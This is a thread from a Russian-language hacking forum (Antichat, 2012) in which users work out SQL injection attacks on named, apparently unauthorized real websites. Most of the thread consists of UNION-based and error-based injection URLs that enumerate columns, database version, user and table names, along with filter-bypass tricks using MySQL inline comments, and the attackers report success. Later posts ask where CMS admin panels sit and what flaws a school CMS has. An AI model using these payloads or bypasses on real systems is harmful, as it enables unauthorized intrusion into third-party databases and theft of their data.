ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.01.2012, 19:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
3622
Репутация:
0
|
|
появилась проблема посерьёзнее предыдущий
в общем ситуация такая, есть пациент "avmaniacs.com", нашёл там sql inj, знаю точное кол-во стобцов, определил командой
www.avmaniacs.com/review.php?id=-319+group+by+27-- , если вместо 27 поставить число 28, то появится ошибка "Unknown column '28' in 'group statement'" следовательно стобцов 27
теперь вставляю такой запрос
www.avmaniacs.com/review.php?id=-319+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,27--
поидеи должна отобразится страница где покажутся несколько цифр, но мнесто этого вылазиет страница "Forbidden"
что можно мне сделать??
|
|
|
|
17.01.2012, 19:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от muljtik
muljtik said:
что можно мне сделать??
Код:
Code:
http://www.avmaniacs.com/review.php?id=319+or+1+group+by+concat_ws(0x3a,version(),0x00,rand(0)|0)+having+min(0)--+f
Код:
Code:
Duplicate entry '5.1.56:' for key 'group_key'
Код:
Code:
http://www.avmaniacs.com/review.php?id=319+and(select+1+from(select+count(*),/*!concat*/((select+table_name+from+information_schema./**/tables+limit+0,1),floor(rand(0)*2))x+from+information_schema./**/tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry 'CHARACTER_SETS1' for key 'group_key'
Фильтрует union(но нам это не нужно), concat, information_schema.tables. Обходим:
concat - /*!concat*/
information_schema./**/tables
|
|
|
|
18.01.2012, 02:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
3622
Репутация:
0
|
|
спасибо за разъяснение, теперь буду знать выходит такая ошибка значит фильтруют что то
из твоего кода снова ничего не понял, но нашёл более простое решение обхода фильтра
"/*!union*/+/*!select*/"
на двух пациентах проканало, больше не встречалось таких
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]avmaniacs[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]review[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]319[/COLOR][COLOR="#FF8000"]/*!union*/[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!select*/[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]18[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]23[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]26[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]--
[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ceripp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]it[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]curriculum[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#FF8000"]/*!union*/[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!select*/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]--
[/COLOR][/COLOR]
---------------------
хрен там что оказывается
получилось только узнать версию и юзера, начал узнавать table_name как тут же меня обламали с ошибками на несуществующую страницу...
------------
оказывается не всё так плохо как я думал
сделав запрос вот такого вида
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ceripp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]it[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]curriculum[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#FF8000"]/*!union*/[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!select*/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#FF8000"]/*!table_name*/[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!from*/[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#FF8000"]/*!information_schema.tables*/[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
я получил то что хотел |
|
|
|
18.01.2012, 10:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Просто через error-based подбирать кол-во полей не нужно. Но и один минус - выводит только 64 символа(это не проблема, благодаря nikp ).
|
|
|
|
15.02.2012, 17:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
5057
Репутация:
0
|
|
как через ФТП узнать домен сайта? joomla
|
|
|
|
15.02.2012, 19:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от sssr1
sssr1 said:
как через ФТП узнать домен сайта? joomla
$mosConfig_live_site = 'http://ваш_сайт.ru';
|
|
|
|
20.02.2012, 15:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
49472
Репутация:
0
|
|
Не видели подобную цмску и где по дефолту админка?? (нарыл в темпах сайта) |
|
|
|
20.02.2012, 22:25
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Сообщение от infoseller
infoseller said:
Не видели подобную цмску и где по дефолту админка?? (нарыл в темпах сайта) http://www.activecollab.com/
|
|
|
21.02.2012, 21:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
20657
Репутация:
2
|
|
какие есть баги и уязвимости у движка NetSchool
|
|
|
|
22.02.2012, 18:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
3513
Репутация:
0
|
|
Такая проблема:
С неизвестного URL действует скрипт, выполняющий запросы к API одного сервиса. Какие запросы выяснить, конечно же, можно. Но можно ли выяснить URL этого скрипта?
//сори, если не туда С:
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
